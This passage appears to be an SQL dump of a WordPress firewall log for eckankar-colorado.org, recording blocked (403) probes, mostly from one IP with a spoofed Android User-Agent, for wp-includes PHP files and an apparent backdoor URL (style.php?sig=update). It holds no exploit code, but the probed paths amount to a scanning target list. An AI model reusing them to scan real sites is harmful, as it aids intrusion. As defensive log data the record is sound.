Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133766,1699930477.970443,1699930477.961500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.apetag.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmFwZXRhZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133748,1699930444.933152,1699930444.919200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.ac3.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8uYWMzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133898,1699931601.539433,1699931601.502100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133749,1699930438.719962,1699930438.711200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.riff.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8ucmlmZi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133750,1699930428.450073,1699930428.441300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.quicktime.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8ucXVpY2t0aW1lLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133960,1699932228.347413,1699932228.338500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWF1dG9zYXZlcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133832,1699931022.933035,1699931022.911300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133765,1699930486.665602,1699930486.656900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.id3v1.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmlkM3YxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133751,1699930422.504366,1699930422.495200,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133752,1699930419.786988,1699930419.778300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.matroska.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8ubWF0cm9za2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133764,1699930490.185879,1699930490.177000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.id3v2.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmlkM3YyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133753,1699930415.324087,1699930415.314800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.flv.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8uZmx2LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133754,1699930410.070025,1699930410.060300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.asf.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8uYXNmLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133755,1699930403.506584,1699930403.497500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/getid3.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9nZXRpZDMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133763,1699930495.221094,1699930495.212400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.tag.lyrics3.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUudGFnLmx5cmljczMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133756,1699930396.899896,1699930396.891100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/getid3.lib.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9nZXRpZDMubGliLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133757,1699930393.276566,1699930393.254600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133762,1699930453.056428,1699930453.047700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.dts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8uZHRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133758,1699930353.781073,1699930353.772300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133833,1699931007.763654,1699931007.750200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/gzdecode.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9nemRlY29kZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133759,1699930344.985855,1699930344.976900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'http://eckankar-colorado.org/wp-content/uploads/wp-staging/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1zdGFnaW5nLw==\",\"category\":\"brute-force\",\"ssl\":0}'),(133760,1699930342.397603,1699930342.388700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133761,1699930464.569213,1699930464.559900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio.flac.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8uZmxhYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133830,1699931048.901871,1699931048.877300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff/Renderer.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9SZW5kZXJlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133770,1699930506.063853,1699930506.049300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134026,1699932610.232680,1699932610.222700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/php72compat.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 